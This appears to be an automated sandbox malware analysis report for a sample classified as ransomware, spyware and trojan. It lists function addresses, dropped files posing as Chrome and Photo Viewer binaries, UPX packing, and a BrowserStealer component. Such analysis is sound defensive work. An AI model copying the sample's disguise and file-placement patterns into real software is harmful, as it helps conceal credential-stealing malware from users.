Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E1740	2_2_00007FF72B8E1740
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E1F60	2_2_00007FF72B8E1F60
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E8794	2_2_00007FF72B8E8794
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E9EA0	2_2_00007FF72B8E9EA0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8EDEF0	2_2_00007FF72B8EDEF0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8F5E7C	2_2_00007FF72B8F5E7C
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E35A0	2_2_00007FF72B8E35A0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E5D30	2_2_00007FF72B8E5D30
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E1D54	2_2_00007FF72B8E1D54
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8EE570	2_2_00007FF72B8EE570
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF8BA247774	2_2_00007FF8BA247774
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0042F963	5_2_0042F963
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00429906	5_2_00429906
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0043EA07	5_2_0043EA07
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00438C7E	5_2_00438C7E
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00454044	5_2_00454044
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_004360F7	5_2_004360F7
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00439111	5_2_00439111
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00432125	5_2_00432125
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_004382D0	5_2_004382D0
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0042E394	5_2_0042E394
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00436445	5_2_00436445
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00431476	5_2_00431476
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0043976F	5_2_0043976F
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00447738	5_2_00447738
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00430949	5_2_00430949
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00447967	5_2_00447967
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0044FA90	5_2_0044FA90
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00423AB7	5_2_00423AB7
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00424C6E	5_2_00424C6E
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00435E86	5_2_00435E86
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0044FF3E	5_2_0044FF3E
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00422FCB	5_2_00422FCB
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00430FAC	5_2_00430FAC
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A7F4C	6_2_00007FF6447A7F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447B1038	6_2_00007FF6447B1038
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF644797960	6_2_00007FF644797960
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447B73BC	6_2_00007FF6447B73BC
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447B6470	6_2_00007FF6447B6470
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A1D90	6_2_00007FF6447A1D90
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A7D98	6_2_00007FF6447A7D98
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447AE5B0	6_2_00007FF6447AE5B0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447B66EC	6_2_00007FF6447B66EC
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A2E50	6_2_00007FF6447A2E50
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447B6E70	6_2_00007FF6447B6E70
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A87D0	6_2_00007FF6447A87D0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A37E0	6_2_00007FF6447A37E0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447B1FE4	6_2_00007FF6447B1FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447B481C	6_2_00007FF6447B481C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A6030	6_2_00007FF6447A6030
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF644791F50	6_2_00007FF644791F50
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A1F94	6_2_00007FF6447A1F94
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447990D0	6_2_00007FF6447990D0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447BA0F8	6_2_00007FF6447BA0F8
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447AE11C	6_2_00007FF6447AE11C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A7F4C	6_2_00007FF6447A7F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A1980	6_2_00007FF6447A1980
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A21A0	6_2_00007FF6447A21A0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A3BE4	6_2_00007FF6447A3BE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447AEC30	6_2_00007FF6447AEC30
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447B4380	6_2_00007FF6447B4380
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A1B84	6_2_00007FF6447A1B84
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447B1038	6_2_00007FF6447B1038
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A23A4	6_2_00007FF6447A23A4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447AA530	6_2_00007FF6447AA530
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694EC1F2C	7_2_0000020694EC1F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694ECD0E0	7_2_0000020694ECD0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694ED38A8	7_2_0000020694ED38A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694EF2B2C	7_2_0000020694EF2B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694EFDCE0	7_2_0000020694EFDCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694F044A8	7_2_0000020694F044A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936B6964	7_2_00007FF6936B6964
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936989E0	7_2_00007FF6936989E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF693691000	7_2_00007FF693691000
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF69369ACAD	7_2_00007FF69369ACAD
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF69369A47B	7_2_00007FF69369A47B
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A5D30	7_2_00007FF6936A5D30
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A1B50	7_2_00007FF6936A1B50
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936B08C8	7_2_00007FF6936B08C8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936B6418	7_2_00007FF6936B6418
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936B3C10	7_2_00007FF6936B3C10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A2C10	7_2_00007FF6936A2C10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936B5C00	7_2_00007FF6936B5C00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936ADA5C	7_2_00007FF6936ADA5C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF69369A2DB	7_2_00007FF69369A2DB
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A39A4	7_2_00007FF6936A39A4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A2164	7_2_00007FF6936A2164
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A1944	7_2_00007FF6936A1944
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936B40AC	7_2_00007FF6936B40AC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936B1874	7_2_00007FF6936B1874
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A80E4	7_2_00007FF6936A80E4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936B08C8	7_2_00007FF6936B08C8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A8794	7_2_00007FF6936A8794
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A1F60	7_2_00007FF6936A1F60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A1740	7_2_00007FF6936A1740
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF693699800	7_2_00007FF693699800
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A9EA0	7_2_00007FF6936A9EA0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936B5E7C	7_2_00007FF6936B5E7C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936B9728	7_2_00007FF6936B9728
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936ADEF0	7_2_00007FF6936ADEF0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A35A0	7_2_00007FF6936A35A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936AE570	7_2_00007FF6936AE570
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936A1D54	7_2_00007FF6936A1D54
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E731F2C	8_2_000001F16E731F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7438A8	8_2_000001F16E7438A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E73D0E0	8_2_000001F16E73D0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7A2B2C	8_2_000001F16E7A2B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7B44A8	8_2_000001F16E7B44A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7ADCE0	8_2_000001F16E7ADCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936B6964	8_2_00007FF6936B6964
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF693691000	8_2_00007FF693691000
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF69369ACAD	8_2_00007FF69369ACAD
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF69369A47B	8_2_00007FF69369A47B
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A5D30	8_2_00007FF6936A5D30
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A1B50	8_2_00007FF6936A1B50
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936B08C8	8_2_00007FF6936B08C8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936B6418	8_2_00007FF6936B6418
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936B3C10	8_2_00007FF6936B3C10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A2C10	8_2_00007FF6936A2C10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936B5C00	8_2_00007FF6936B5C00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936ADA5C	8_2_00007FF6936ADA5C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF69369A2DB	8_2_00007FF69369A2DB
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A39A4	8_2_00007FF6936A39A4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A2164	8_2_00007FF6936A2164
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A1944	8_2_00007FF6936A1944
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936989E0	8_2_00007FF6936989E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936B40AC	8_2_00007FF6936B40AC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936B1874	8_2_00007FF6936B1874
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A80E4	8_2_00007FF6936A80E4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936B08C8	8_2_00007FF6936B08C8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A8794	8_2_00007FF6936A8794
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A1F60	8_2_00007FF6936A1F60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A1740	8_2_00007FF6936A1740
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF693699800	8_2_00007FF693699800
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A9EA0	8_2_00007FF6936A9EA0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936B5E7C	8_2_00007FF6936B5E7C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936B9728	8_2_00007FF6936B9728
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936ADEF0	8_2_00007FF6936ADEF0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A35A0	8_2_00007FF6936A35A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936AE570	8_2_00007FF6936AE570
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936A1D54	8_2_00007FF6936A1D54
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A80718A0	8_2_00007FF8A80718A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87A6180	8_2_00007FF8A87A6180
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8849AE0	8_2_00007FF8A8849AE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87F0A40	8_2_00007FF8A87F0A40
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87E8290	8_2_00007FF8A87E8290
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A882F8D0	8_2_00007FF8A882F8D0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A88518C0	8_2_00007FF8A88518C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87DE980	8_2_00007FF8A87DE980
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87D6948	8_2_00007FF8A87D6948
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8815960	8_2_00007FF8A8815960
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87DAAB0	8_2_00007FF8A87DAAB0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8831AC0	8_2_00007FF8A8831AC0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A888FA50	8_2_00007FF8A888FA50
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A881CB80	8_2_00007FF8A881CB80
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8864B80	8_2_00007FF8A8864B80
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87EBB60	8_2_00007FF8A87EBB60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87F7C90	8_2_00007FF8A87F7C90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87D3CA0	8_2_00007FF8A87D3CA0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87E8CF0	8_2_00007FF8A87E8CF0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8856C50	8_2_00007FF8A8856C50
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8829D10	8_2_00007FF8A8829D10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87F2D10	8_2_00007FF8A87F2D10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87D6D42	8_2_00007FF8A87D6D42
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87DFD60	8_2_00007FF8A87DFD60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A883DEB0	8_2_00007FF8A883DEB0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8828E30	8_2_00007FF8A8828E30
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8817E40	8_2_00007FF8A8817E40
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87D8F10	8_2_00007FF8A87D8F10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87FBF40	8_2_00007FF8A87FBF40
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87E70E0	8_2_00007FF8A87E70E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87D40F0	8_2_00007FF8A87D40F0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8841000	8_2_00007FF8A8841000
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87EC1B0	8_2_00007FF8A87EC1B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8834110	8_2_00007FF8A8834110
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87E1120	8_2_00007FF8A87E1120
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87F62B0	8_2_00007FF8A87F62B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87F52C0	8_2_00007FF8A87F52C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87D4390	8_2_00007FF8A87D4390
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A88133B0	8_2_00007FF8A88133B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A883F3A0	8_2_00007FF8A883F3A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87FD3F0	8_2_00007FF8A87FD3F0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A88713E0	8_2_00007FF8A88713E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87EB300	8_2_00007FF8A87EB300
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8844350	8_2_00007FF8A8844350
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87D9480	8_2_00007FF8A87D9480
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87FB490	8_2_00007FF8A87FB490
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A88584A0	8_2_00007FF8A88584A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87D6400	8_2_00007FF8A87D6400
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8857460	8_2_00007FF8A8857460
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A887E5C0	8_2_00007FF8A887E5C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87E25F0	8_2_00007FF8A87E25F0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A881E530	8_2_00007FF8A881E530
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8839530	8_2_00007FF8A8839530
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87FF570	8_2_00007FF8A87FF570
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A882D6E0	8_2_00007FF8A882D6E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8804660	8_2_00007FF8A8804660
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8864790	8_2_00007FF8A8864790
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A88387B0	8_2_00007FF8A88387B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A88287E0	8_2_00007FF8A88287E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A880A705	8_2_00007FF8A880A705
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87FC720	8_2_00007FF8A87FC720
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A881D740	8_2_00007FF8A881D740
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87D2850	8_2_00007FF8A87D2850
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A87E5870	8_2_00007FF8A87E5870
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8F297E0	8_2_00007FF8A8F297E0

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe 9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
Source: Joe Sandbox View	Dropped File: C:\Program Files\Google\Chrome\updater.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278

Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FF8A87FFF00 appears 38 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FF693692910 appears 34 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FF693692710 appears 104 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FF8A87D9D60 appears 155 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FF8A87D8C40 appears 31 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FF8A87D8E10 appears 128 times
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: String function: 00007FF644792B30 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: String function: 00441590 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: String function: 00441D60 appears 31 times
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: String function: 00007FF72B8D2910 appears 34 times
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: String function: 00007FF72B8D2710 appears 104 times

Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.6.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: rar.exe.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: wxyubnjmnlae.tmp.20.dr	Static PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: updater.exe.20.dr	Static PE information: Number of sections : 11 > 10
Source: setup.exe.12.dr	Static PE information: Number of sections : 11 > 10

Source: iqA8j9yGcd.exe, 00000000.00000003.2012424329.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs iqA8j9yGcd.exe
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs iqA8j9yGcd.exe
Source: iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs iqA8j9yGcd.exe
Source: iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs iqA8j9yGcd.exe
Source: iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs iqA8j9yGcd.exe
Source: iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs iqA8j9yGcd.exe
Source: iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs iqA8j9yGcd.exe
Source: iqA8j9yGcd.exe, 00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs iqA8j9yGcd.exe
Source: iqA8j9yGcd.exe	Binary or memory string: OriginalFilename vs iqA8j9yGcd.exe
Source: iqA8j9yGcd.exe, 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs iqA8j9yGcd.exe

Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9989805572769122
Source: python311.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9993348982785603
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9945956541218638
Source: libcrypto-3.dll.7.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9989805572769122
Source: libssl-3.dll.7.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9920756022135416
Source: python311.dll.7.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9993348982785603
Source: sqlite3.dll.7.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9975802135547202
Source: unicodedata.pyd.7.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9945956541218638

Source: main.exe.12.dr, utils.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Update.exe.14.dr, utils.cs	Cryptographic APIs: 'CreateDecryptor'

Source: Update.exe.14.dr, BrowserStealer.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: main.exe.12.dr, BrowserStealer.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Update.exe.14.dr, utils.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Update.exe.14.dr, utils.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: main.exe.12.dr, utils.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: main.exe.12.dr, utils.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.expl.evad.winEXE@169/133@5/3

